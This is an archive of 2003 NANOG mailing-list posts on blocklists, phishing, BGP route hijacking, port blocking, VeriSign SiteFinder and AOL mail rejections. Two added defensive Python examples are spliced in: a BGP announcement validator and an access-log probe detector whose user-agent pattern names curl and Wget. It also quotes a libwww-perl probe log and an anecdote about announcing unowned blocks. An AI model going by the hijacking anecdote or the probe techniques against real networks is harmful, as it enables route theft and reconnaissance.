I run the Abusive Hosts Blocking List (http://www.ahbl.org). We list everything from spam sources, to spam supporters, open proxies, open relays, drones, etc. It's in use on all of the mail servers I help administrate (which includes several Fortune 500 companies, half a dozen regional ISPs, and several .edu sites), plus SpamHaus, SpamCop BL, SORBS, EasyNet, and several others, which help balance out protection. A good list of all known ones is up at: http://www.declude.com/junkmail/support/ip4r.htm The only DNSbl which you really should avoid like the plague is the XBL (which I believe is gone at this point). In the various places where I've gotten a look at their spam protection, SpamHaus is very popular, as is SpamCop's BL. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org - Original Message - From: Paul S. Brown [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, November 20, 2003 10:16 AM Subject: RBLs in use I have been asked to find out what DNSBLs are in use so my employer can see what the incidence of its being blacklisted is and how much impact this is likely to have had on their business. What DNSBLs are being used by the various agencies represented on NANOG and how much weighting do you give them. Are there any DNSBLs you would completely ignore due to data quality issues? Thanks Paul
Re: Email security issues
This is one of those times where either PGP/GPG or these digital ID things in Outlook/Outlook Express would come in handy. Not that I would expect normal users to bother to check to see if the sig is legit or not, considering these are the same people who seem to have no problem opening a zip file and running an exe in it (ala MiMail). -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org - Original Message - From: Daniel Roesen [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, November 10, 2003 2:30 PM Subject: Re: Email security issues On Mon, Nov 10, 2003 at 01:10:42PM -0600, Adi Linden wrote: I've just received a nice email from my banker (ok, it claims to be from my banker) asking me to visit my bank's website and confirm my email address. This email is by far the most convincing piece of fraud I have received to date so far. The URL loads up the bank page plus a popup providing a login. Looking at the source of the popup, it reveals that it is positively not a legit source and most likely used to harvest people's access information. Yep, got the same one. Quite a good fake. Even the faked Received: line has an IP from an IP block of this bank. The only technical thing which I saw when taking a quick look which showed the fake was the .edu relay in between. Best regards, Daniel
Re: Hijacked IP space.
- Original Message - From: Joe Abley [EMAIL PROTECTED] To: Randy Bush [EMAIL PROTECTED] Cc: Bill Woodcock [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Tuesday, November 04, 2003 10:17 AM Subject: Re: Hijacked IP space. How should your peers certify that the routes you announce are reasonable for them to receive? Still doesn't solve the problem of ISPs announcing out hijacked blocks. It is stupidly simple to announce out blocks you don't own. A few years ago, when I was a netadmin, we on several occasions announced out blocks we had no permission to announce out (/24s). This happened on the days after 9/11 as well when we acquired customers whose ISPs didn't survive the collapse of the NYC telco network. All it took was using the BGP request form at a large unnamed Tier 1 backbone provider, and our filters were adjusted to allow us to announce out any network we wanted to. No questions asked, no authorization forms, nothing. I've confirmed this behavior with several of the backbones. Why are these backbones allowing their T1 customers to make these kind of announcements without any kind of authorization forms or simple checking to see if it's a valid announcement for that customer? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
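The "simple checking" the post above says the backbone's BGP request form never did, as an added example that is not code from the original post or from any provider: a customer's requested announcement is validated against the prefixes that customer is authorized for (what a signed LOA or an IRR route object would record), anything more specific than the transit policy allows is refused, and the resulting per-customer inbound prefix filter is rendered. The ASNs, the prefixes, the /24 limit and the filter syntax (Cisco IOS ip prefix-list) are assumptions made for the example.

```python
"""Added example, not code from the original post or any provider's system:
validate a customer's requested BGP announcement against the prefixes it is
authorized for, and render the inbound prefix filter. ASNs, prefixes, the
prefix-length limit and the IOS filter syntax are assumed for the example."""
import ipaddress

# Constructed authorization table: customer ASN -> blocks a signed LOA or an
# IRR route object puts on file for it.
AUTHORIZED = {
    64500: ["198.51.100.0/24", "203.0.113.0/24"],
    64501: ["192.0.2.0/24"],
}
MAX_PREFIX_LEN = 24   # assumed transit policy: nothing longer than a /24

def check_announcement(asn: int, prefix: str):
    """Return (verdict, reason). Accept only prefixes equal to or inside an
    authorized block and no longer than MAX_PREFIX_LEN; everything else,
    including a /24 that belongs to somebody else's customer, is refused."""
    pfx = ipaddress.ip_network(prefix, strict=False)
    if pfx.prefixlen > MAX_PREFIX_LEN:
        return "reject", f"/{pfx.prefixlen} longer than /{MAX_PREFIX_LEN}"
    for block in AUTHORIZED.get(asn, []):
        auth = ipaddress.ip_network(block)
        if pfx.version == auth.version and pfx.subnet_of(auth):
            return "accept", f"covered by {auth}"
    return "reject", "no authorization on file for this ASN"

def audit_request(asn: int, prefixes):
    """Run the check over one request form; return the entries to refuse."""
    rejected = []
    for p in prefixes:
        verdict, reason = check_announcement(asn, p)
        if verdict == "reject":
            rejected.append((p, reason))
    return rejected

def build_prefix_list(asn: int):
    """Per-customer inbound filter: permit the authorized blocks (and their
    sub-blocks down to MAX_PREFIX_LEN), then deny everything else."""
    name = f"AS{asn}-IN"
    lines = [
        f"ip prefix-list {name} seq {10 * i} permit {ipaddress.ip_network(b)} le {MAX_PREFIX_LEN}"
        for i, b in enumerate(AUTHORIZED.get(asn, []), start=1)
    ]
    lines.append(f"ip prefix-list {name} seq 1000 deny 0.0.0.0/0 le 32")
    return lines

if __name__ == "__main__":
    # A request form (constructed) that mixes the customer's own block, a /24
    # belonging to another customer, and an over-long sub-block.
    request = ["198.51.100.0/24", "192.0.2.0/24", "203.0.113.128/25"]
    for p, why in audit_request(64500, request):
        print(f"refuse {p}: {why}")
    print("\n".join(build_prefix_list(64500)))
```

The legitimate case the post mentions (customers acquired after 9/11 whose previous ISP no longer existed) is handled by updating the table, not by bypassing the check: the new customer supplies the LOA or gets the route object reassigned, the filter is regenerated, and the announcement is accepted because the paperwork now covers it.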
Re: [Full-Disclosure] Gates: 'You don't need perfect code' for good security
http://groups.google.com/groups?hl=enlr=ie=UTF-8selm=Xns94258238F273Cbruns2mbitcom%40130.133.1.4 From my post to the NANAE newsgroup... My favorite quote is... BG: Until we had this concept of Web services, software on the Internet couldn't talk to other software on the Internet. The only thing that worked was you could move bits - that's TCP/IP - or you could put up screens - that's HTML - but software couldn't talk to software. It's good to know my PuTTY application can't talk to my OpenSSH server, or that my Exim mail server can't actually talk to other mail servers. :-) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org - Original Message - From: james [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, October 31, 2003 5:00 PM Subject: Fw: [Full-Disclosure] Gates: 'You don't need perfect code' for good security One word HA ! james - Original Message - From: Jeremiah Cornelius To: [EMAIL PROTECTED] Sent: Friday, October 31, 2003 11:32 AM Subject: [Full-Disclosure] Gates: 'You don't need perfect code' for good security : -BEGIN PGP SIGNED MESSAGE- : Hash: SHA1 : : FLAME ON! : : http://www.itbusiness.ca/index.asp?theaction=61sid=53897 : : But there are two other techniques: one is called firewalling and the other : is called keeping the software up to date. None of these problems (viruses : and worms) happened to people who did either one of those things. If you had : your firewall set up the right way - and when I say firewall I include : scanning e-mail and scanning file transfer -- you wouldn't have had a : problem. But did we have the tools that made that easy and automatic and that : you could really audit that you had done it? No. Microsoft in particular and : the industry in general didn't have it. : : The second is just the updating thing.
Anybody who kept their software up to : date didn't run into any of those problems, because the fixes preceded the : exploit. Now the times between when the vulnerability was published and when : somebody has exploited it, those have been going down, but in every case at : this stage we've had the fix out before the exploit. So next is making it : easy to do the updating, not for general features but just for the very few : critical security things, and then reducing the size of those patches, and : reducing the frequency of the patches, which gets you back to the code : quality issues. We have to bring these things to bear, and the very dramatic : things that we can do in the short term have to do with the firewalls and the : updating infrastructure. : : ___ : Full-Disclosure - We believe in it. : Charter: http://lists.netsys.com/full-disclosure-charter.html James Edwards Routing and Security Administrator [EMAIL PROTECTED] At the Santa Fe Office: Internet at Cyber Mesa Store hours: 9-6 Monday through Friday 505-988-9200 SIP:1(747)669-1965
Re: ISPs' willingness to take action
Believe it or not, there are. When I ran a large network at an unnamed ISP, we ran graphing on certain types of traffic, and an awful lot of our business customers were doing this - with their home users accessing their corp Exchange servers with no VPN. The only thing I could guess is that they weren't willing to hire someone to do things right. There were certain situations why I had to do this personally. At the time, when I took over, there was no Exchange admin, and I was rather clueless on how to manage Exchange, so for quite a while I stumbled through trying to get things working correctly and properly securing it (and several times severely broke it). It was several months before I felt comfortable adjusting the main setup of the server so that it would work fine on my VPN hookup from the office network to the house. It's a lot different now that I am familiar with Exchange. I was trying to get rid of Exchange, but the fact that our corp office was a bunch of idiots who had no idea how to use anything else but Outlook made it nearly impossible to switch to a pure POP3/SMTP setup with an online calendar and shared address book. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511 - Original Message - From: Stewart, William C (Bill), RTSLS [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, October 27, 2003 1:27 AM Subject: Re: ISPs' willingness to take action Brian Bruns asserts that there are lots of home users connecting to their office Exchange servers without VPNs, and that therefore blocking the Microsoft ports was bad. While I agree with his point that you shouldn't do it without documenting what you are or are not blocking, I'm really surprised to hear the assertion that people are leaving unfirewalled Exchange servers out on the net. Is this actually common?/shudders...
Re: ISPs' willingness to take action
Yeah, but what happens is when you use the web based interface and non-outlook pop3/imap/smtp clients is that you lose access to things like shared address books, shared calendars and other things which these people depend on. At least, from what I remember, Exchange 5.5 lacked these features via the web based interface. Might be different now. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511 - Original Message - From: [EMAIL PROTECTED] To: NANOG [EMAIL PROTECTED] Sent: Monday, October 27, 2003 9:52 AM Subject: RE: ISPs' willingness to take action VPN technologies are either too weak, like PPTP, too expensive or difficult to grasp like IPsec, or too new like the HTTPS tunnels. A couple of years ago, I was working at a company that used Exchange for corporate email. They had a web version of Outlook that, I believe, was part of Exchange server. It is almost a no-brainer to put that up on an HTTPS server. Due to the prevalence of online shopping and banking, even relatively clueless users understand how to look for the secure web browsing icon (key or lock). This is reasonably strong security, cheap to implement and easy to grasp. It's also been proven for almost 10 years now. And if you don't like Outlook's web version, there is always one of the many web email packages like SquirrelMail http://www.squirrelmail.org/ which can use IMAP or POP (both supported on Exchange server) and which can be secured via SSL/HTTPS. Somebody oughta sell a secure email box that plugs in between the Exchange server and the network and includes a secure SMTP server relay, secure POP server, secure IMAP server and secure web email interface. No doubt somebody already supplies boxes like this, and ISPs just have to start reselling them. I don't recall the source, but it was recently reported that 40% of the exchange server base is still on the v5.5 platform. 
Using that as a general indication, many of these shops probably won't plan to upgrade anytime soon. According to Google, Exchange 5.5 does both POP and IMAP so the possibility of secure web mail service is there. Seems to me that you could sell some service and educate the users about safe email practices at the same time. --Michael Dillon
Re: ISPs' willingness to take action
- Original Message -
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Sunday, October 26, 2003 8:01 PM
Subject: ISPs' willingness to take action

By the way, can anybody explain to me a legitimate use for port 135/137 traffic across the Internet, like it's somebody's private LAN? Seems to me anybody who still thinks that's legitimate is living in the past. So, the big question: why don't ISPs do more of this? Are they afraid of client reaction? Doesn't wash, for me: most clients would be highly grateful, and all it really takes for the remainder is fair warning. Cost? Again, you can judge for yourselves how low the fruit you choose to pick; the biggest gains have the best ROI. Happy clients, liberated bandwidth, faster servers -- what's to lose?

Problem is, some applications, like Outlook for example (if I remember correctly), like to use 135, 137, 139 and others to connect to the Exchange server. You block them, and it will start to croak. You have a lot of home users not using a VPN to connect to their office Exchange servers. I used to do this myself at times. When you sell a service to someone, and neglect to mention you block certain incoming ports, especially to a possible business user or home user trying to access their office, you put yourself in a really bad position.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511
Re: opinions on the com/net wildcard issue
Your results look a hell of a lot more realistic than what Verisign tried to get people to swallow at SECSAC. Too bad they won't take it seriously because it's 'obviously biased' :-/

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511

- Original Message -
From: Paul Vixie [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Thursday, October 23, 2003 10:07 PM
Subject: opinions on the com/net wildcard issue

my survey is over. see http://sa.vix.com/~vixie/comnetsurv/ for the results.
Re: Heads-up: ATT apparently going to whitelist-only inbound mail
I'm getting nothing but timeouts at this point to any of ATT's mail servers. Nothing going through at all.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511

- Original Message -
From: Marshall Eubanks [EMAIL PROTECTED]
To: Mike Tancsa [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Tuesday, October 21, 2003 5:57 PM
Subject: Re: Heads-up: ATT apparently going to whitelist-only inbound mail

Here is my experience (names are changed to protect...):

Failed to deliver to '[EMAIL PROTECTED]'
SMTP module(domain att.com) reports:
message text rejected by ckmsi2.att.com:
550 5.7.1 Your message was rejected as possible spam. Please call your ATT contact. [3]

Failed to deliver to '[EMAIL PROTECTED]'
SMTP module(domain att.com) reports:
message text rejected by ckmsi2.att.com:
550 5.7.1 Your message was rejected as possible spam. Please call your ATT contact. [3]

Failed to deliver to '[EMAIL PROTECTED]'
SMTP module(domain att.com) reports:
message text rejected by ckmsi2.att.com:
550 5.7.1 Your message was rejected as possible spam. Please call your ATT contact. [3]

Failed to deliver to '[EMAIL PROTECTED]'
SMTP module(domain att.com) reports:
message text rejected by ckmsi2.att.com:
550 5.7.1 Your message was rejected as possible spam. Please call your ATT contact. [3]

Failed to deliver to '[EMAIL PROTECTED]'
SMTP module(domain att.com) reports:
message text rejected by ckmsi2.att.com:
550 5.7.1 Your message was rejected as possible spam. Please call your ATT contact. [3]

On Tuesday, October 21, 2003, at 05:46 PM, Mike Tancsa wrote:

Wow, this sounds like a pretty extreme shotgun approach. (or is it April 1st somewhere). Is ATT going to make this whitelist publicly available? Perhaps if there was some global white list that everyone could consult against, it might be a little more useable. Still, what do you do about multi-stage relays?

---Mike
Unusual GET requests
Hmmm, this is probably off-topic, but I can't seem to find anything online which explains this and I've never seen it before. Maybe someone else here has seen this in their logs or has any idea what would do this? It's obviously trying to gather some sort of information; could it be a prelude to some sort of DoS or exploit that's not publicly known yet?

68.63.88.173 - - [21/Oct/2003:19:47:49 -0500] GET /pad-Files HTTP/1.1 404 322 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:49 -0500] GET /PAD-FILES HTTP/1.1 404 322 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:49 -0500] GET /Pad-Files HTTP/1.1 404 322 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:48 -0500] GET /Pad-files HTTP/1.1 404 322 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:48 -0500] GET /pad-files HTTP/1.1 404 322 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:48 -0500] GET /PAD-FILE HTTP/1.1 404 321 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:48 -0500] GET /Pad-file HTTP/1.1 404 321 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:47 -0500] GET /pad-File HTTP/1.1 404 321 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:47 -0500] GET /Pad-File HTTP/1.1 404 321 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:44 -0500] GET /PadFiles HTTP/1.1 404 321 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:44 -0500] GET /Padfiles HTTP/1.1 404 321 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:44 -0500] GET /PADFILES HTTP/1.1 404 321 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:44 -0500] GET /padfiles HTTP/1.1 404 321 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:43 -0500] GET /PadFile HTTP/1.1 404 320 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:43 -0500] GET /Padfile HTTP/1.1 404 320 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:43 -0500] GET /PADFILE HTTP/1.1 404 320 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:43 -0500] GET /padfile HTTP/1.1 404 320 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:43 -0500] GET /Pads HTTP/1.1 404 317 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:43 -0500] GET /PADS HTTP/1.1 404 317 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:42 -0500] GET /pads HTTP/1.1 404 317 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:42 -0500] GET /Pad HTTP/1.1 404 316 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:42 -0500] GET /PAD HTTP/1.1 404 316 - libwww-perl/5.65
68.63.88.173 - - [21/Oct/2003:19:47:42 -0500] GET /pad HTTP/1.1 404 316 - libwww-perl/5.65

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511
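The pattern in those log lines (one scripted client, many capitalisations of the same name, every one a 404, all within a few seconds) is easy to pick out mechanically. The following is an added example, not code from the post: it parses Apache combined-format lines and flags any client that asks for several spellings of one path inside a short window and only gets 404s back. The sample lines are constructed to mirror the post's requests, with documentation-range addresses in place of the real client.

```python
"""Flag clients that probe a web server with case permutations of one path.

Added example for the access-log excerpt above; it is not code from the
original post.  The sample lines are constructed in Apache "combined" format,
modelled on the libwww-perl requests in the post, with documentation-range
addresses instead of the real client.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# User-agent prefixes of scripted clients; a hit is corroborating evidence only.
SCRIPTED_UA = ("libwww-perl", "curl/", "Wget/", "python-")

# Constructed sample: one scripted client walks spellings of "pad" and
# "pad-files"; a second, ordinary client fetches two ordinary pages.
SAMPLE_LINES = [
    '192.0.2.10 - - [21/Oct/2003:19:47:42 -0500] "GET /pad HTTP/1.1" 404 316 "-" "libwww-perl/5.65"',
    '192.0.2.10 - - [21/Oct/2003:19:47:42 -0500] "GET /PAD HTTP/1.1" 404 316 "-" "libwww-perl/5.65"',
    '192.0.2.10 - - [21/Oct/2003:19:47:42 -0500] "GET /Pad HTTP/1.1" 404 316 "-" "libwww-perl/5.65"',
    '192.0.2.10 - - [21/Oct/2003:19:47:48 -0500] "GET /pad-files HTTP/1.1" 404 322 "-" "libwww-perl/5.65"',
    '192.0.2.10 - - [21/Oct/2003:19:47:48 -0500] "GET /Pad-files HTTP/1.1" 404 322 "-" "libwww-perl/5.65"',
    '192.0.2.10 - - [21/Oct/2003:19:47:49 -0500] "GET /Pad-Files HTTP/1.1" 404 322 "-" "libwww-perl/5.65"',
    '192.0.2.10 - - [21/Oct/2003:19:47:49 -0500] "GET /PAD-FILES HTTP/1.1" 404 322 "-" "libwww-perl/5.65"',
    '192.0.2.10 - - [21/Oct/2003:19:47:49 -0500] "GET /pad-Files HTTP/1.1" 404 322 "-" "libwww-perl/5.65"',
    '198.51.100.7 - - [21/Oct/2003:19:47:45 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Oct/2003:19:47:46 -0500] "GET /Index.html HTTP/1.1" 404 301 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_case_probes(lines, min_variants=4, window=timedelta(seconds=30)):
    """Return one finding per (client, case-folded path) where the client asked
    for at least `min_variants` spellings of the same name inside `window` and
    every request was a 404.  Browsers and crawlers rarely do this; a script
    guessing the capitalisation of a file it expects to exist does it in seconds."""
    by_client = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        by_client[rec["ip"]].append(rec)

    findings = []
    for ip, recs in by_client.items():
        groups = defaultdict(list)
        for rec in recs:
            groups[rec["path"].lower()].append(rec)
        for name, group in groups.items():
            spellings = {r["path"] for r in group}
            times = sorted(r["ts"] for r in group)
            if (len(spellings) >= min_variants
                    and times[-1] - times[0] <= window
                    and all(r["status"] == 404 for r in group)):
                findings.append({
                    "client": ip,
                    "name": name,
                    "variants": len(spellings),
                    "first": times[0],
                    "last": times[-1],
                    "scripted_ua": any(r["ua"].startswith(SCRIPTED_UA) for r in group),
                })
    return sorted(findings, key=lambda f: (f["client"], f["name"]))


if __name__ == "__main__":
    for f in find_case_probes(SAMPLE_LINES):
        print(f"{f['client']} tried {f['variants']} spellings of {f['name']} "
              f"between {f['first']:%H:%M:%S} and {f['last']:%H:%M:%S} "
              f"(scripted UA: {f['scripted_ua']})")
```

Lowering `min_variants` to 3 also catches the shorter `/pad` group in the sample; the threshold is the knob that trades noise against the short probes.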
Re: False information: CEO of Versign facts are wrong
- Original Message -
From: Sean Donelan [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Friday, October 17, 2003 8:26 AM
Subject: False information: CEO of Versign facts are wrong

http://news.com.com/2008-7347-5092590.html

Quotes Stratton Sclavos: The DDOS (distributed denial-of-service) attacks last October on the root system--hey, there are 13 global copies of that, and they're all operating. It should scare people that nine of the 13 went down. It's time for the Internet infrastructure to go commercial. On the core services of the infrastructure, it's time to pull the root servers away from volunteers who run them out of a university or lab or some other level. That's going to be an unpopular decision.

Methinks that one comment is going to make them even more hated than Microsoft or SCO (who both rank right up there with being universally despised on the Internet). They are digging themselves a grave that's a few miles deep. Let's hope ICANN sees this and makes the right decision on how to deal with this growing problem. I'm going to play journalist for a while and make some calls. I'll let you know what kind of 'official' statements I can drag out of these idiots.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511
Re: False information: CEO of Versign facts are wrong
I'm going to play journalist for a while and make some calls.

Ok, first part of my mission is a success. I spoke with a Jim Hock from Bite Communications (Verisign's PR firm), very nice conversation, started out with Verisign's concerns, then we spoke a little bit on the issues people have brought up here. He will be communicating with me over the next week or so, as well as putting me in touch with some technical people there.

So here is where I need you guys' help. Put together a list of questions, comments, etc. that you feel are appropriate (about the general issues of Verisign, its implementation of SiteFinder, its handling of the root servers, and other things of importance) in an e-mail to me and send it off. I'll compile a list of questions and pose them to the people I talk to. Don't worry, unless you ask me to, I won't mention who these questions are from.

I'm not siding with Verisign on this issue - not by far. But one thing that I discussed with my admins today was the need for better communication between Verisign and the tech community. Thus, I'm going to put aside my misgivings about the past with them and try to hopefully open a worthwhile dialog between everyone who wants to be heard. Verisign has admitted they made mistakes in their handling of the issue, and it sounds like they want to try to do things right this time. ICANN has a job to do, and I'm sure they will do the right thing, but there is a rift forming between the community and Verisign, and that's not going to help the situation at all.

You all may not like me, or agree with me, but this is hopefully an opportunity where you can get some of your voices heard outside of an official process like the SECSAC, and that might result in a better understanding on both sides. I will of course keep everyone who wants to know up on how things are going and what I talk about with them, and you are all welcome to comment to me about anything.

The worst that can happen is that we get nowhere with talking and everyone is still divided with nothing accomplished. But, here's to hoping that something good might come out of this.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511
Re: Pitfalls of annoucing /24s
- Original Message -
From: Ejay Hire [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Friday, October 17, 2003 5:54 PM
Subject: RE: Pitfalls of annoucing /24s

Am I the only one that has never had an issue multihoming with /24's?

Nope. Most of the networks I've run are basically nothing but blocks of /24 announcements out of a larger /20 or whatever size block that has been assigned. In fact, it was a lot easier for me to handle the network in that fashion, because I could easily control where traffic for a specific use came in, etc.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511
SECSAC Meeting on Verisign Sitefinder Service
http://media.icann.org/ramgen/encoder/secsac.rm

Live feed of the meeting. Having listened to just about 5 minutes so far, Verisign is fudging quite a bit on how many people like the SiteFinder service. It's almost unreal to hear what they are saying.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511
Re: abuse from a user of this list
- Original Message -
From: Booth, Michael (ENG) [EMAIL PROTECTED]
To: William Allen Simpson [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Monday, October 13, 2003 7:18 AM
Subject: Re: abuse from a user of this list

I didn't draw that conclusion at all. Much the opposite, judging from their photo gallery, they seem like a bunch of script kiddies trying to make a name for themselves in the open source community, while bumming around for jobs, and doing hosting on their Ameritech DSL in blatant violation of their AUP (any guys from SBC on this list?). I wouldn't take them seriously. Have a listen to http://www.poptix.net/trelane.mp3 for proof of their maturity. Calling someone and telling them to get a life, in response to a NANOG post, is like a paraplegic telling me I walk funny.

I ain't even going to get in the middle of the spat between poptix and trelane. That's their fight, not mine. I suggest everyone else butt out of the situation as well.

Now, I _do_ take offense to being called a script kiddie. I've been doing development for more than 7 years in various projects under various aliases. I have never once resorted to the tactics and methods of those who attack EFNet servers, SPEWS, Sorbs, Osirusoft, etc. In fact, most of the people who have been attacked are good friends of mine, and I've been working in very great detail and using what limited resources and staff we have to help these people. With no funding, yeah, we can't match the larger security groups or companies, but we've survived hell and back and are still standing on our own feet. People have yet to learn that we help others because we like to, because it's the right thing, and because this world is seriously lacking in good guys. We are a group made up of many cultures, from developers, to end users, to gamers (which is why we were one of the biggest sponsors of one of the largest gaming competitions in Sweden). Just because we don't make public everything we do doesn't mean we don't exist or haven't done good things.

I'm tired of this, I really am. My family is upset at the growing amount of harassment, and that's dragging me farther and farther into this mess. I have enough health problems to begin with.

On the Ameritech/SBC AUP issue, the only thing I have to say is that we have a business class DSL line, which is specifically for situations like what we are doing. It's apparent that we are disliked here by some, but hitting below the belt by going after our provider isn't going to solve anything or change anything.

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511
Re: Abuse Departments
- Original Message -
From: Matthew S. Hallacy [EMAIL PROTECTED]
To: Matt [EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Sunday, October 12, 2003 3:18 AM
Subject: Re: Abuse Departments

Most places will take care of abuse issues if they get to the right person, but some places simply won't wake up their network admin at 11:00 on a Saturday night because some script kiddie's DSL is getting attacked by another script kiddie on IRC.

Watch yourself poptix - you don't have such a squeaky clean past either. Point is this. If your network/servers are being used in an attack against someone else, you can be held responsible if you do not act in a timely manner. This script kiddie's DSL is actually a shared setup with several servers on the end of it and a firewall. What happens to it also affects me and my customers. When my customers go down, I get complaints. Now, if your network was attacking mine from a compromised box, and you failed to act in a timely fashion, regardless of whether it's a DSL or a T1 or a dialup for that matter, I'd either sue you myself for allowing the attack to continue, or give my customers your info and let THEM sue you for it.
Re: Abuse Departments
- Original Message -
From: Bryan Heitman [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Sunday, October 12, 2003 11:33 AM
Subject: Re: Abuse Departments

Would you perhaps have more underlying problems if a script kiddie on a dialup can attack you in such a way to impact your service?

Sorry, I meant a DSL, T1, dialup, whatever as the one being attacked. I just woke up, so cut me some slack here.
AOL mail server problems?
Hello everyone,

I've noticed some weird things going on with AOL's SMTP servers today -

2003-10-12 12:37:48 1A8k8X-0002OC-0c Remote host mailin-04.mx.aol.com [64.12.138.89] closed connection in response to initial connection
2003-10-12 12:37:55 1A8k8X-0002OC-0c Remote host mailin-04.mx.aol.com [64.12.136.153] closed connection in response to initial connection
2003-10-12 12:38:35 1A8k8X-0002OC-0c Remote host mailin-04.mx.aol.com [152.163.224.122] closed connection in response to initial connection

Have about 40 of these in my mail logs going to different AOL SMTP servers. Trying to connect by hand using telnet results in the mail servers closing the connection right away without giving a reason. I did however, out of about 20 tests, get through once and actually got the server's welcome message.

Any ideas?

--
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
ICQ: 8077511
Re: AOL mail server problems?
- Original Message -
From: [EMAIL PROTECTED]
To: Brian Bruns [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Sunday, October 12, 2003 2:16 PM
Subject: Re: AOL mail server problems?

They're probably blocking you. Have you gotten many scomp complaints recently?...perhaps a big backlog of them that you/your abuse people haven't dealt with? Last time I dealt with AOL blocking us, that was the cause, and the result was mixed. Sometimes we'd get the connection closed as above, sometimes a 550 message telling us we were blocked.

Well, just to be absolutely sure, I checked the forwardings for abuse@, postmaster@, and a few others, all of which go to [EMAIL PROTECTED]. I haven't seen any mail from AOL support/abuse/tech/whatever to us (nor has any of the other admins). We are a very small and close-knit group with very few actual users - stuff like spam, viruses, and mailbombs get noticed really quickly (we all have pagers/cell phones which get a message whenever the system detects something unusual going on).

